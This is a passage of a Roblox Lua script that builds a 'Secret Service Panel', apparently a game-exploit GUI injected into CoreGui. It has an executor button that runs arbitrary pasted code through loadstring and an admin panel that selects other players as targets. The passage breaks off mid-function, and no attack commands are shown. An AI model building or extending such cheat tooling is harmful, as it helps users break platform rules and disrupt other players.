1 | local SecrectServicePanelFoldr = Instance.new("Folder",game:GetService("ReplicatedStorage")) |
2 | SecrectServicePanelFoldr.Name = "SecrectServicePanel" |
3 | local Player = Instance.new("StringValue",game:GetService("ReplicatedStorage"):WaitForChild("SecrectServicePanel")) |
4 | Player.Name = "Player" |
5 | Player.Value = game:GetService("Players").LocalPlayer.Name |
6 | |
7 | removething = function(name,parent) for i,v in pairs(parent:GetChildren()) do if v.Name == name then v:Destroy() end end end |
8 | removething("S3crectS4viceP1nel",game:GetService("CoreGui")) |
9 | |
10 | local S3crectS4viceP1nel = Instance.new("ScreenGui") |
11 | local Frame = Instance.new("Frame") |
12 | local Packages = Instance.new("Frame") |
13 | local ScrollingFrame = Instance.new("ScrollingFrame") |
14 | local TextBox = Instance.new("TextBox") |
15 | local zoom_out = Instance.new("ImageButton") |
16 | local UIGridLayout = Instance.new("UIGridLayout") |
17 | local Example = Instance.new("TextButton") |
18 | local more_vert = Instance.new("ImageButton") |
19 | local NameLabel = Instance.new("TextLabel") |
20 | local TextButton = Instance.new("TextButton") |
21 | local close = Instance.new("ImageButton") |
22 | local remove = Instance.new("ImageButton") |
23 | local Frame_2 = Instance.new("Frame") |
24 | local arrow_drop_up = Instance.new("ImageButton") |
25 | local arrow_drop_up_2 = Instance.new("ImageButton") |
26 | local TextLabel = Instance.new("TextLabel") |
27 | local navigate_next = Instance.new("ImageButton") |
28 | local AdminPanel = Instance.new("Frame") |
29 | local AdminFrame = Instance.new("Frame") |
30 | local ScrollingFrame_2 = Instance.new("ScrollingFrame") |
31 | local UIGridLayout_2 = Instance.new("UIGridLayout") |
32 | local ExampleCMD = Instance.new("TextButton") |
33 | local PlayersFrame = Instance.new("Frame") |
34 | local ScrollingFrame_3 = Instance.new("ScrollingFrame") |
35 | local UIGridLayout_3 = Instance.new("UIGridLayout") |
36 | local ExamplePlrs = Instance.new("TextButton") |
37 | local TextButton_2 = Instance.new("TextButton") |
38 | local refresh = Instance.new("ImageButton") |
39 | local Executor = Instance.new("Frame") |
40 | local TextButton_3 = Instance.new("TextButton") |
41 | local TextButton_4 = Instance.new("TextButton") |
42 | local TextBox_2 = Instance.new("TextBox") |
43 | local Frame_3 = Instance.new("Frame") |
44 | local UIListLayout = Instance.new("UIListLayout") |
45 | local Frame_4 = Instance.new("Frame") |
46 | local packages = Instance.new("TextButton") |
47 | |
48 | --Properties: |
49 | |
50 | S3crectS4viceP1nel.Name = "S3crectS4viceP1nel" |
51 | S3crectS4viceP1nel.Parent = game:GetService("CoreGui") |
52 | S3crectS4viceP1nel.ZIndexBehavior = Enum.ZIndexBehavior.Sibling |
53 | S3crectS4viceP1nel.ResetOnSpawn = false |
54 | |
55 | Frame.Parent = S3crectS4viceP1nel |
56 | Frame.BackgroundColor3 = Color3.fromRGB(59, 58, 59) |
57 | Frame.BorderSizePixel = 0 |
58 | Frame.Position = UDim2.new(0.628370464, 0, 0.529925168, 0) |
59 | Frame.Size = UDim2.new(0, 442, 0, 265) |
60 | |
61 | Packages.Name = "Packages" |
62 | Packages.Parent = Frame |
63 | Packages.BackgroundColor3 = Color3.fromRGB(36, 35, 36) |
64 | Packages.BorderSizePixel = 0 |
65 | Packages.Position = UDim2.new(0.211046755, 0, 0.150033444, 0) |
66 | Packages.Size = UDim2.new(0, 334, 0, 197) |
67 | Packages.Visible = false |
68 | |
69 | ScrollingFrame.Parent = Packages |
70 | ScrollingFrame.Active = true |
71 | ScrollingFrame.BackgroundColor3 = Color3.fromRGB(38, 37, 38) |
72 | ScrollingFrame.BorderSizePixel = 0 |
73 | ScrollingFrame.Position = UDim2.new(0.0269461069, 0, -3.09823122e-07, 0) |
74 | ScrollingFrame.Size = UDim2.new(0, 338, 0, 195) |
75 | ScrollingFrame.ScrollBarThickness = 0 |
76 | |
77 | TextBox.Parent = ScrollingFrame |
78 | TextBox.BackgroundColor3 = Color3.fromRGB(47, 46, 49) |
79 | TextBox.BorderSizePixel = 0 |
80 | TextBox.LayoutOrder = -999 |
81 | TextBox.Position = UDim2.new(-0.195084736, 0, -1.28571427, 0) |
82 | TextBox.Size = UDim2.new(0, 324, 0, 18) |
83 | TextBox.Font = Enum.Font.SourceSans |
84 | TextBox.PlaceholderColor3 = Color3.fromRGB(178, 178, 178) |
85 | TextBox.PlaceholderText = "Search" |
86 | TextBox.Text = "" |
87 | TextBox.TextColor3 = Color3.fromRGB(178, 178, 178) |
88 | TextBox.TextSize = 14.000 |
89 | TextBox.TextXAlignment = Enum.TextXAlignment.Left |
90 | |
91 | zoom_out.Name = "zoom_out" |
92 | zoom_out.Parent = TextBox |
93 | zoom_out.BackgroundTransparency = 1.000 |
94 | zoom_out.LayoutOrder = 7 |
95 | zoom_out.Position = UDim2.new(0.897297323, 0, 0.191768795, 0) |
96 | zoom_out.Size = UDim2.new(0, 16, 0, 17) |
97 | zoom_out.ZIndex = 2 |
98 | zoom_out.Image = "rbxassetid://3926307971" |
99 | zoom_out.ImageColor3 = Color3.fromRGB(178, 178, 178) |
100 | zoom_out.ImageRectOffset = Vector2.new(284, 164) |
101 | zoom_out.ImageRectSize = Vector2.new(36, 36) |
102 | |
103 | UIGridLayout.Parent = ScrollingFrame |
104 | UIGridLayout.SortOrder = Enum.SortOrder.LayoutOrder |
105 | UIGridLayout.CellPadding = UDim2.new(0, 0, 0, 0) |
106 | UIGridLayout.CellSize = UDim2.new(0, 338, 0, 25) |
107 | |
108 | Example.Name = "Example" |
109 | Example.Parent = SecrectServicePanelFoldr |
110 | Example.BackgroundColor3 = Color3.fromRGB(53, 52, 53) |
111 | Example.BorderSizePixel = 0 |
112 | Example.Position = UDim2.new(0.00834664889, 0, 0.139153346, 0) |
113 | Example.Size = UDim2.new(0, 338, 0, 25) |
114 | Example.Font = Enum.Font.SourceSans |
115 | Example.Text = "Example" |
116 | Example.TextColor3 = Color3.fromRGB(255, 255, 255) |
117 | Example.TextSize = 13.000 |
118 | Example.TextXAlignment = Enum.TextXAlignment.Left |
119 | |
120 | more_vert.Name = "more_vert" |
121 | more_vert.Parent = Example |
122 | more_vert.BackgroundTransparency = 1.000 |
123 | more_vert.LayoutOrder = 9 |
124 | more_vert.Position = UDim2.new(0.917309701, 0, 0.128279269, 0) |
125 | more_vert.Size = UDim2.new(0, 16, 0, 17) |
126 | more_vert.ZIndex = 2 |
127 | more_vert.Image = "rbxassetid://3926305904" |
128 | more_vert.ImageRectOffset = Vector2.new(764, 764) |
129 | more_vert.ImageRectSize = Vector2.new(36, 36) |
130 | |
131 | NameLabel.Name = "NameLabel" |
132 | NameLabel.Parent = Frame |
133 | NameLabel.BackgroundColor3 = Color3.fromRGB(255, 255, 255) |
134 | NameLabel.BackgroundTransparency = 1.000 |
135 | NameLabel.Size = UDim2.new(0, 121, 0, 15) |
136 | NameLabel.Font = Enum.Font.SourceSans |
137 | NameLabel.Text = "Secret Service Panel" |
138 | NameLabel.TextColor3 = Color3.fromRGB(255, 255, 255) |
139 | NameLabel.TextSize = 14.000 |
140 | NameLabel.TextWrapped = true |
141 | NameLabel.TextXAlignment = Enum.TextXAlignment.Left |
142 | |
143 | TextButton.Parent = Frame |
144 | TextButton.BackgroundColor3 = Color3.fromRGB(53, 52, 53) |
145 | TextButton.BorderSizePixel = 0 |
146 | TextButton.Position = UDim2.new(0.002358553, 0, 0.0630111992, 0) |
147 | TextButton.Size = UDim2.new(0, 213, 0, 22) |
148 | TextButton.Font = Enum.Font.SourceSans |
149 | TextButton.Text = "Executor" |
150 | TextButton.TextColor3 = Color3.fromRGB(255, 255, 255) |
151 | TextButton.TextSize = 14.000 |
152 | |
153 | close.Name = "close" |
154 | close.Parent = Frame |
155 | close.BackgroundTransparency = 1.000 |
156 | close.Position = UDim2.new(0.955525577, 0, -0.00276563875, 0) |
157 | close.Size = UDim2.new(0, 16, 0, 17) |
158 | close.ZIndex = 2 |
159 | close.Image = "rbxassetid://3926305904" |
160 | close.ImageRectOffset = Vector2.new(284, 4) |
161 | close.ImageRectSize = Vector2.new(24, 24) |
162 | |
163 | remove.Name = "remove" |
164 | remove.Parent = Frame |
165 | remove.BackgroundTransparency = 1.000 |
166 | remove.LayoutOrder = 6 |
167 | remove.Position = UDim2.new(0.912398934, 0, -0.00218338333, 0) |
168 | remove.Size = UDim2.new(0, 16, 0, 17) |
169 | remove.ZIndex = 2 |
170 | remove.Image = "rbxassetid://3926307971" |
171 | remove.ImageRectOffset = Vector2.new(884, 284) |
172 | remove.ImageRectSize = Vector2.new(36, 36) |
173 | |
174 | Frame_2.Parent = Frame |
175 | Frame_2.BackgroundColor3 = Color3.fromRGB(48, 46, 49) |
176 | Frame_2.BorderSizePixel = 0 |
177 | Frame_2.Position = UDim2.new(0.961906016, 0, 0.148312107, 0) |
178 | Frame_2.Size = UDim2.new(0, 16, 0, 196) |
179 | |
180 | arrow_drop_up.Name = "arrow_drop_up" |
181 | arrow_drop_up.Parent = Frame_2 |
182 | arrow_drop_up.BackgroundTransparency = 1.000 |
183 | arrow_drop_up.LayoutOrder = 8 |
184 | arrow_drop_up.Position = UDim2.new(0, 0, 0.00291936332, 0) |
185 | arrow_drop_up.Size = UDim2.new(0, 16, 0, 17) |
186 | arrow_drop_up.ZIndex = 2 |
187 | arrow_drop_up.Image = "rbxassetid://3926307971" |
188 | arrow_drop_up.ImageRectOffset = Vector2.new(164, 484) |
189 | arrow_drop_up.ImageRectSize = Vector2.new(36, 36) |
190 | |
191 | arrow_drop_up_2.Name = "arrow_drop_up" |
192 | arrow_drop_up_2.Parent = Frame_2 |
193 | arrow_drop_up_2.BackgroundTransparency = 1.000 |
194 | arrow_drop_up_2.LayoutOrder = 8 |
195 | arrow_drop_up_2.Position = UDim2.new(0, 0, 0.918412328, 0) |
196 | arrow_drop_up_2.Rotation = 180.000 |
197 | arrow_drop_up_2.Size = UDim2.new(0, 16, 0, 17) |
198 | arrow_drop_up_2.ZIndex = 2 |
199 | arrow_drop_up_2.Image = "rbxassetid://3926307971" |
200 | arrow_drop_up_2.ImageRectOffset = Vector2.new(164, 484) |
201 | arrow_drop_up_2.ImageRectSize = Vector2.new(36, 36) |
202 | |
203 | TextLabel.Parent = Frame |
204 | TextLabel.BackgroundColor3 = Color3.fromRGB(56, 55, 58) |
205 | TextLabel.BorderSizePixel = 0 |
206 | TextLabel.Position = UDim2.new(0.0520361997, 0, 0.905660391, 0) |
207 | TextLabel.Size = UDim2.new(0, 415, 0, 18) |
208 | TextLabel.Font = Enum.Font.SourceSans |
209 | TextLabel.LineHeight = 1.170 |
210 | TextLabel.Text = "Click or press ; to enter a command." |
211 | TextLabel.TextColor3 = Color3.fromRGB(255, 255, 255) |
212 | TextLabel.TextSize = 13.000 |
213 | TextLabel.TextXAlignment = Enum.TextXAlignment.Left |
214 | |
215 | navigate_next.Name = "navigate_next" |
216 | navigate_next.Parent = TextLabel |
217 | navigate_next.BackgroundTransparency = 1.000 |
218 | navigate_next.LayoutOrder = 13 |
219 | navigate_next.Position = UDim2.new(-0.0570844896, 0, 0.0119052464, 0) |
220 | navigate_next.Size = UDim2.new(0, 24, 0, 17) |
221 | navigate_next.ZIndex = 2 |
222 | navigate_next.Image = "rbxassetid://3926305904" |
223 | navigate_next.ImageRectOffset = Vector2.new(444, 844) |
224 | navigate_next.ImageRectSize = Vector2.new(36, 36) |
225 | |
226 | AdminPanel.Name = "AdminPanel" |
227 | AdminPanel.Parent = Frame |
228 | AdminPanel.BackgroundColor3 = Color3.fromRGB(36, 35, 36) |
229 | AdminPanel.BorderSizePixel = 0 |
230 | AdminPanel.Position = UDim2.new(0.211046755, 0, 0.150033444, 0) |
231 | AdminPanel.Size = UDim2.new(0, 334, 0, 197) |
232 | AdminPanel.Visible = false |
233 | |
234 | AdminFrame.Name = "AdminFrame" |
235 | AdminFrame.Parent = AdminPanel |
236 | AdminFrame.BackgroundColor3 = Color3.fromRGB(255, 255, 255) |
237 | AdminFrame.BackgroundTransparency = 1.000 |
238 | AdminFrame.Position = UDim2.new(0.0179640725, 0, 0.0507614203, 0) |
239 | AdminFrame.Size = UDim2.new(0, 209, 0, 184) |
240 | |
241 | ScrollingFrame_2.Parent = AdminFrame |
242 | ScrollingFrame_2.Active = true |
243 | ScrollingFrame_2.BackgroundColor3 = Color3.fromRGB(255, 255, 255) |
244 | ScrollingFrame_2.BackgroundTransparency = 1.000 |
245 | ScrollingFrame_2.BorderSizePixel = 0 |
246 | ScrollingFrame_2.Size = UDim2.new(0, 208, 0, 184) |
247 | ScrollingFrame_2.BottomImage = "" |
248 | ScrollingFrame_2.MidImage = "" |
249 | ScrollingFrame_2.TopImage = "" |
250 | |
251 | UIGridLayout_2.Parent = ScrollingFrame_2 |
252 | UIGridLayout_2.SortOrder = Enum.SortOrder.LayoutOrder |
253 | UIGridLayout_2.CellSize = UDim2.new(0, 100, 0, 30) |
254 | UIGridLayout_2.StartCorner = Enum.StartCorner.BottomLeft |
255 | |
256 | ExampleCMD.Name = "ExampleCMD" |
257 | ExampleCMD.Parent = SecrectServicePanelFoldr |
258 | ExampleCMD.BackgroundColor3 = Color3.fromRGB(53, 52, 53) |
259 | ExampleCMD.BorderSizePixel = 0 |
260 | ExampleCMD.Position = UDim2.new(0.00834664889, 0, 0.0630109012, 0) |
261 | ExampleCMD.Size = UDim2.new(0, 82, 0, 26) |
262 | ExampleCMD.Font = Enum.Font.SourceSans |
263 | ExampleCMD.Text = "Example" |
264 | ExampleCMD.TextColor3 = Color3.fromRGB(255, 255, 255) |
265 | ExampleCMD.TextSize = 13.000 |
266 | ExampleCMD.TextXAlignment = Enum.TextXAlignment.Left |
267 | |
268 | PlayersFrame.Name = "PlayersFrame" |
269 | PlayersFrame.Parent = AdminPanel |
270 | PlayersFrame.BackgroundColor3 = Color3.fromRGB(255, 255, 255) |
271 | PlayersFrame.BackgroundTransparency = 1.000 |
272 | PlayersFrame.Position = UDim2.new(0.646706581, 0, 0.0558375642, 0) |
273 | PlayersFrame.Size = UDim2.new(0, 112, 0, 184) |
274 | |
275 | ScrollingFrame_3.Parent = PlayersFrame |
276 | ScrollingFrame_3.Active = true |
277 | ScrollingFrame_3.BackgroundColor3 = Color3.fromRGB(255, 255, 255) |
278 | ScrollingFrame_3.BackgroundTransparency = 1.000 |
279 | ScrollingFrame_3.BorderColor3 = Color3.fromRGB(36, 35, 36) |
280 | ScrollingFrame_3.BorderSizePixel = 2 |
281 | ScrollingFrame_3.Size = UDim2.new(0, 113, 0, 184) |
282 | ScrollingFrame_3.BottomImage = "" |
283 | ScrollingFrame_3.CanvasSize = UDim2.new(0, 0, 15, 0) |
284 | ScrollingFrame_3.ScrollBarThickness = 1 |
285 | ScrollingFrame_3.TopImage = "" |
286 | |
287 | UIGridLayout_3.Parent = ScrollingFrame_3 |
288 | UIGridLayout_3.SortOrder = Enum.SortOrder.LayoutOrder |
289 | UIGridLayout_3.CellSize = UDim2.new(0, 120, 0, 30) |
290 | UIGridLayout_3.StartCorner = Enum.StartCorner.BottomLeft |
291 | |
292 | ExamplePlrs.Name = "ExamplePlrs" |
293 | ExamplePlrs.Parent = ScrollingFrame_3 |
294 | ExamplePlrs.BackgroundColor3 = Color3.fromRGB(66, 64, 66) |
295 | ExamplePlrs.BackgroundTransparency = 0.700 |
296 | ExamplePlrs.BorderSizePixel = 0 |
297 | ExamplePlrs.Size = UDim2.new(0, 200, 0, 50) |
298 | ExamplePlrs.Visible = false |
299 | ExamplePlrs.Font = Enum.Font.SourceSans |
300 | ExamplePlrs.Text = "pipeman" |
301 | ExamplePlrs.TextColor3 = Color3.fromRGB(255, 255, 255) |
302 | ExamplePlrs.TextSize = 14.000 |
303 | |
304 | TextButton_2.Parent = Frame |
305 | TextButton_2.BackgroundColor3 = Color3.fromRGB(53, 52, 53) |
306 | TextButton_2.BorderSizePixel = 0 |
307 | TextButton_2.Position = UDim2.new(0.47963801, 0, 0.0641509444, 0) |
308 | TextButton_2.Size = UDim2.new(0, 206, 0, 22) |
309 | TextButton_2.Font = Enum.Font.SourceSans |
310 | TextButton_2.Text = "Admin Panel" |
311 | TextButton_2.TextColor3 = Color3.fromRGB(255, 255, 255) |
312 | TextButton_2.TextSize = 14.000 |
313 | |
314 | refresh.Name = "refresh" |
315 | refresh.Parent = Frame |
316 | refresh.BackgroundTransparency = 1.000 |
317 | refresh.Position = UDim2.new(0.959718883, 0, 0.0717624426, 0) |
318 | refresh.Size = UDim2.new(0, 16, 0, 17) |
319 | refresh.ZIndex = 2 |
320 | refresh.Image = "rbxassetid://3926307971" |
321 | refresh.ImageRectOffset = Vector2.new(404, 84) |
322 | refresh.ImageRectSize = Vector2.new(36, 36) |
323 | |
324 | Executor.Name = "Executor" |
325 | Executor.Parent = Frame |
326 | Executor.BackgroundColor3 = Color3.fromRGB(36, 35, 36) |
327 | Executor.BorderSizePixel = 0 |
328 | Executor.Position = UDim2.new(0.206224695, 0, 0.153291643, 0) |
329 | Executor.Size = UDim2.new(0, 334, 0, 195) |
330 | Executor.ZIndex = 20 |
331 | |
332 | TextButton_3.Parent = Executor |
333 | TextButton_3.BackgroundColor3 = Color3.fromRGB(53, 52, 53) |
334 | TextButton_3.BorderSizePixel = 0 |
335 | TextButton_3.Position = UDim2.new(0.00342089264, 0, 0.8696419, 0) |
336 | TextButton_3.Size = UDim2.new(0, 168, 0, 23) |
337 | TextButton_3.Font = Enum.Font.SourceSans |
338 | TextButton_3.Text = "Execute" |
339 | TextButton_3.TextColor3 = Color3.fromRGB(255, 255, 255) |
340 | TextButton_3.TextSize = 14.000 |
341 | |
342 | TextButton_4.Parent = Executor |
343 | TextButton_4.BackgroundColor3 = Color3.fromRGB(53, 52, 53) |
344 | TextButton_4.BorderSizePixel = 0 |
345 | TextButton_4.Position = UDim2.new(0.503420889, 0, 0.869642198, 0) |
346 | TextButton_4.Size = UDim2.new(0, 157, 0, 23) |
347 | TextButton_4.Font = Enum.Font.SourceSans |
348 | TextButton_4.Text = "Clear" |
349 | TextButton_4.TextColor3 = Color3.fromRGB(255, 255, 255) |
350 | TextButton_4.TextSize = 14.000 |
351 | |
352 | TextBox_2.Parent = Executor |
353 | TextBox_2.BackgroundColor3 = Color3.fromRGB(50, 49, 50) |
354 | TextBox_2.BorderSizePixel = 0 |
355 | TextBox_2.Position = UDim2.new(0.00299401209, 0, -0.00507614203, 0) |
356 | TextBox_2.Size = UDim2.new(0, 324, 0, 170) |
357 | TextBox_2.Font = Enum.Font.SourceSans |
358 | TextBox_2.MultiLine = true |
359 | TextBox_2.Text = "" |
360 | TextBox_2.TextColor3 = Color3.fromRGB(255, 255, 255) |
361 | TextBox_2.TextSize = 14.000 |
362 | TextBox_2.TextXAlignment = Enum.TextXAlignment.Left |
363 | TextBox_2.TextYAlignment = Enum.TextYAlignment.Top |
364 | |
365 | Frame_3.Parent = Executor |
366 | Frame_3.BackgroundColor3 = Color3.fromRGB(50, 49, 50) |
367 | Frame_3.BorderSizePixel = 0 |
368 | Frame_3.Size = UDim2.new(0, 14, 0, 171) |
369 | Frame_3.Visible = false |
370 | |
371 | UIListLayout.Parent = Frame_3 |
372 | UIListLayout.SortOrder = Enum.SortOrder.LayoutOrder |
373 | |
374 | Frame_4.Parent = Frame |
375 | Frame_4.BackgroundColor3 = Color3.fromRGB(38, 37, 38) |
376 | Frame_4.BorderSizePixel = 0 |
377 | Frame_4.Position = UDim2.new(-0.000358005753, 0, 0.152203158, 0) |
378 | Frame_4.Size = UDim2.new(0, 98, 0, 197) |
379 | |
380 | packages.Name = "packages" |
381 | packages.Parent = Frame |
382 | packages.BackgroundColor3 = Color3.fromRGB(53, 52, 53) |
383 | packages.BorderSizePixel = 0 |
384 | packages.Position = UDim2.new(0.00517658424, 0, 0.178197145, 0) |
385 | packages.Size = UDim2.new(0, 95, 0, 28) |
386 | packages.Font = Enum.Font.SourceSans |
387 | packages.Text = "Packages" |
388 | packages.TextColor3 = Color3.fromRGB(255, 255, 255) |
389 | packages.TextSize = 18.000 |
390 | packages.TextWrapped = true |
391 | |
392 | -- Scripts: |
393 | |
394 | local function KNZX_fake_script() -- TextBox.LocalScript |
395 | local script = Instance.new('LocalScript', TextBox) |
396 | |
397 | local searchBar = script.Parent |
398 | local scrolllFrame = script.Parent.Parent |
399 | |
400 | function updateSearch() |
401 | for i,button in pairs(scrolllFrame:GetChildren()) do |
402 | if button:IsA("TextButton") then |
403 | local searchText = string.lower(searchBar.Text) |
404 | if searchText ~= "" then |
405 | local buttonText = string.lower(button.Text) |
406 | if string.find(buttonText, searchText) then |
407 | button.Visible = true |
408 | else |
409 | button.Visible = false |
410 | end |
411 | else |
412 | button.Visible = true |
413 | end |
414 | end |
415 | end |
416 | end |
417 | |
418 | searchBar:GetPropertyChangedSignal("Text"):Connect(updateSearch) |
419 | end |
420 | coroutine.wrap(KNZX_fake_script)() |
421 | local function SGMWI_fake_script() -- TextButton.LocalScript |
422 | local script = Instance.new('LocalScript', TextButton) |
423 | |
424 | script.Parent.MouseButton1Click:Connect(function() |
425 | script.Parent.Parent.AdminPanel.Visible = false |
426 | script.Parent.Parent.Packages.Visible = false |
427 | script.Parent.Parent.Executor.Visible = true |
428 | end) |
429 | end |
430 | coroutine.wrap(SGMWI_fake_script)() |
431 | local function SXSMBHB_fake_script() -- close.LocalScript |
432 | local script = Instance.new('LocalScript', close) |
433 | |
434 | script.Parent.MouseButton1Click:Connect(function() |
435 | script.Parent.Parent.Parent:Destroy() |
436 | end) |
437 | end |
438 | coroutine.wrap(SXSMBHB_fake_script)() |
439 | local function AQRU_fake_script() -- remove.LocalScript |
440 | local script = Instance.new('LocalScript', remove) |
441 | |
442 | script.Parent.MouseButton1Click:Connect(function() |
443 | if script.Parent.Parent.refresh.Visible == true then |
444 | for i,v in pairs(script.Parent.Parent:GetChildren()) do |
445 | if v.Name == "remove" or v.Name == "close" or v.Name == "NameLabel" then |
446 | script.Parent.Parent.Size = UDim2.new(0, 442, 0, 16) |
447 | else |
448 | if v.ClassName ~= "LocalScript" then |
449 | v.Visible = false |
450 | end |
451 | end |
452 | end |
453 | else |
454 | for i,v in pairs(script.Parent.Parent:GetChildren()) do |
455 | if v.Name == "remove" or v.Name == "close" or v.Name == "NameLabel" then |
456 | script.Parent.Parent.Size = UDim2.new(0, 442, 0, 265) |
457 | else |
458 | if v.ClassName ~= "LocalScript" then |
459 | v.Visible = true |
460 | end |
461 | end |
462 | end |
463 | end |
464 | end) |
465 | end |
466 | coroutine.wrap(AQRU_fake_script)() |
467 | local function ZOMFSSU_fake_script() -- Frame.Dragify |
468 | local script = Instance.new('LocalScript', Frame) |
469 | |
470 | local UIS = game:GetService("UserInputService") |
471 | function dragify(Frame) |
472 | dragToggle = nil |
473 | local dragSpeed = 0.50 |
474 | dragInput = nil |
475 | dragStart = nil |
476 | local dragPos = nil |
477 | function updateInput(input) |
478 | local Delta = input.Position - dragStart |
479 | local Position = UDim2.new(startPos.X.Scale, startPos.X.Offset + Delta.X, startPos.Y.Scale, startPos.Y.Offset + Delta.Y) |
480 | game:GetService("TweenService"):Create(Frame, TweenInfo.new(0.30), {Position = Position}):Play() |
481 | end |
482 | Frame.InputBegan:Connect(function(input) |
483 | if (input.UserInputType == Enum.UserInputType.MouseButton1 or input.UserInputType == Enum.UserInputType.Touch) and UIS:GetFocusedTextBox() == nil then |
484 | dragToggle = true |
485 | dragStart = input.Position |
486 | startPos = Frame.Position |
487 | input.Changed:Connect(function() |
488 | if input.UserInputState == Enum.UserInputState.End then |
489 | dragToggle = false |
490 | end |
491 | end) |
492 | end |
493 | end) |
494 | Frame.InputChanged:Connect(function(input) |
495 | if input.UserInputType == Enum.UserInputType.MouseMovement or input.UserInputType == Enum.UserInputType.Touch then |
496 | dragInput = input |
497 | end |
498 | end) |
499 | game:GetService("UserInputService").InputChanged:Connect(function(input) |
500 | if input == dragInput and dragToggle then |
501 | updateInput(input) |
502 | end |
503 | end) |
504 | end |
505 | |
506 | dragify(script.Parent) |
507 | end |
508 | coroutine.wrap(ZOMFSSU_fake_script)() |
509 | local function FLYT_fake_script() -- ExampleCMD.LocalScript |
510 | local script = Instance.new('LocalScript', ExampleCMD) |
511 | |
512 | script.Parent.MouseButton1Click:Connect(function() |
513 | --size changer |
514 | end) |
515 | end |
516 | coroutine.wrap(FLYT_fake_script)() |
517 | local function GKOVJ_fake_script() -- ScrollingFrame_3.LocalScript |
518 | local script = Instance.new('LocalScript', ScrollingFrame_3) |
519 | |
520 | for i,v in pairs(game:GetService("Players"):GetChildren()) do |
521 | if v:IsA("Player") then |
522 | --local NewPlayer = Instance.new("TextButton",script.Parent) |
523 | --NewPlayer.Active = true |
524 | --NewPlayer.AutoButtonColor = true |
525 | --NewPlayer.BackgroundColor3 = Color3.new(66,64,66) |
526 | --NewPlayer.BackgroundTransparency = 0.7 |
527 | --NewPlayer.BorderSizePixel = 0 |
528 | --NewPlayer.Name = v.Name |
529 | --NewPlayer.Visible = true |
530 | --NewPlayer.Text = v.Name |
531 | --NewPlayer.TextColor3 = Color3.new(255,255,255) |
532 | --NewPlayer.TextScaled = true |
533 | --NewPlayer.TextWrapped = true |
534 | local NewPlayer = script.Parent.ExamplePlrs:Clone() |
535 | NewPlayer.Name = v.Name |
536 | NewPlayer.Text = v.Name |
537 | NewPlayer.Parent = script.Parent |
538 | NewPlayer.Visible = true |
539 | NewPlayer.MouseButton1Click:Connect(function() |
540 | Player.Value = NewPlayer.Text |
541 | end) |
542 | end |
543 | end |
544 | end |
545 | coroutine.wrap(GKOVJ_fake_script)() |
546 | local function EHNJJIG_fake_script() -- TextButton_2.LocalScript |
547 | local script = Instance.new('LocalScript', TextButton_2) |
548 | |
549 | script.Parent.MouseButton1Click:Connect(function() |
550 | script.Parent.Parent.AdminPanel.Visible = true |
551 | script.Parent.Parent.Packages.Visible = false |
552 | script.Parent.Parent.Executor.Visible = false |
553 | end) |
554 | end |
555 | coroutine.wrap(EHNJJIG_fake_script)() |
556 | local function QRUYCIJ_fake_script() -- refresh.LocalScript |
557 | local script = Instance.new('LocalScript', refresh) |
558 | |
559 | script.Parent.MouseButton1Click:Connect(function() |
560 | for i,v in pairs(script.Parent.Parent.AdminPanel.PlayersFrame:GetChildren()) do |
561 | if v:IsA("TextButton") then |
562 | if v.Name == "ExamplePlrs" then |
563 | -- none |
564 | else |
565 | v:Destroy() |
566 | end |
567 | end |
568 | end |
569 | |
570 | for i,v in pairs(game:GetService("Players"):GetChildren()) do |
571 | if v:IsA("Player") then |
572 | --local NewPlayer = Instance.new("TextButton",script.Parent) |
573 | --NewPlayer.Active = true |
574 | --NewPlayer.AutoButtonColor = true |
575 | --NewPlayer.BackgroundColor3 = Color3.new(66,64,66) |
576 | --NewPlayer.BackgroundTransparency = 0.7 |
577 | --NewPlayer.BorderSizePixel = 0 |
578 | --NewPlayer.Name = v.Name |
579 | --NewPlayer.Visible = true |
580 | --NewPlayer.Text = v.Name |
581 | --NewPlayer.TextColor3 = Color3.new(255,255,255) |
582 | --NewPlayer.TextScaled = true |
583 | --NewPlayer.TextWrapped = true |
584 | local NewPlayer = ExamplePlrs:Clone() |
585 | NewPlayer.Name = v.Name |
586 | NewPlayer.Text = v.Name |
587 | NewPlayer.Parent = PlayersFrame.ScrollingFrame |
588 | NewPlayer.Visible = true |
589 | NewPlayer.MouseButton1Click:Connect(function() |
590 | Player.Value = NewPlayer.Text |
591 | end) |
592 | end |
593 | end |
594 | end) |
595 | end |
596 | coroutine.wrap(QRUYCIJ_fake_script)() |
597 | local function SHGQSS_fake_script() -- TextButton_3.LocalScript |
598 | local script = Instance.new('LocalScript', TextButton_3) |
599 | |
600 | script.Parent.MouseButton1Click:Connect(function() |
601 | loadstring(script.Parent.Parent.TextBox.Text)() |
602 | end) |
603 | end |
604 | coroutine.wrap(SHGQSS_fake_script)() |
605 | local function LOFLOFC_fake_script() -- TextButton_4.LocalScript |
606 | local script = Instance.new('LocalScript', TextButton_4) |
607 | |
608 | script.Parent.MouseButton1Click:Connect(function() |
609 | script.Parent.Parent.TextBox.Text = " " |
610 | end) |
611 | end |
612 | coroutine.wrap(LOFLOFC_fake_script)() |
613 | local function VQHBXP_fake_script() -- TextBox_2.LocalScript |
614 | local script = Instance.new('LocalScript', TextBox_2) |
615 | |
616 | --local t1, count = script.Parent.Text:gsub("\n", "") |
617 | |
618 | --for i = 0, count, 1 do |
619 | -- local CurrentLine = Instance.new("TextBox",script.Parent.Parent.Frame) |
620 | -- CurrentLine.BackgroundTransparency = 1 |
621 | -- CurrentLine.BorderSizePixel = 0 |
622 | -- CurrentLine.LayoutOrder = 0 |
623 | -- CurrentLine.Name = count |
624 | -- CurrentLine.Size = UDim2.new(0, 16, 0, 12) |
625 | -- CurrentLine.ZIndex = 100 |
626 | -- CurrentLine.TextColor3 = Color3.new(255,255,255) |
627 | -- CurrentLine.TextScaled = true |
628 | -- CurrentLine.TextWrapped = true |
629 | -- CurrentLine.Text = count |
630 | -- wait(1) |
631 | --end |
632 | end |
633 | coroutine.wrap(VQHBXP_fake_script)() |
634 | local function IRDU_fake_script() -- packages.LocalScript |
635 | local script = Instance.new('LocalScript', packages) |
636 | |
637 | script.Parent.MouseButton1Click:Connect(function() |
638 | script.Parent.Parent.AdminPanel.Visible = false |
639 | script.Parent.Parent.Packages.Visible = true |
640 | script.Parent.Parent.Executor.Visible = false |
641 | end) |
642 | end |
643 | coroutine.wrap(IRDU_fake_script)() |
644 | local function CreateCMD(name,callback) |
645 | local NewCMD = ExampleCMD:Clone() |
646 | NewCMD.Name = name |
647 | NewCMD.Text = name |
648 | NewCMD.Parent = ScrollingFrame_2 |
649 | NewCMD.MouseButton1Click:Connect(callback) |
650 | end |
651 | local function CreateScript(name,callback) |
652 | local NewPackage = Example:Clone() |
